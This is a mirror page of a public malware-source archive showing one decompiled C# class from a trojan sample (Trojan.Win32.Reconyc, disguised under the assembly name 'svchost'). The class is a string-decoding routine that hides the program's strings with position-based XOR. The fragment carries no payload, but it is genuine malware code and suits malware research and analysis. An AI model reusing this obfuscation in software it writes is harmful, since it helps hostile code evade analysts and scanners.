mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-19 09:56:10 +00:00
f2ac1ece55
add
23 lines
848 B
C#
23 lines
848 B
C#
// Decompiled with JetBrains decompiler
|
|
// Type: ?195?
|
|
// Assembly: svchost, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 0572F6A4-2AE0-441B-8B88-3FB3343AE211
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Reconyc.efsu-49381cd9042bc3cc4ed4ef172003f6330ee39256d57a554e08499cf3b3054e87.exe
|
|
|
|
public class \u003F195\u003F
|
|
{
|
|
public static string \u003F196\u003F(string _param0)
|
|
{
|
|
int length = _param0.Length;
|
|
char[] chArray = new char[length];
|
|
for (int index = 0; index < chArray.Length; ++index)
|
|
{
|
|
char ch = _param0[index];
|
|
byte num1 = (byte) ((uint) ch ^ (uint) (length - index));
|
|
byte num2 = (byte) ((int) ch >> 8 ^ index);
|
|
chArray[index] = (char) ((uint) num2 << 8 | (uint) num1);
|
|
}
|
|
return string.Intern(new string(chArray));
|
|
}
|
|
}
|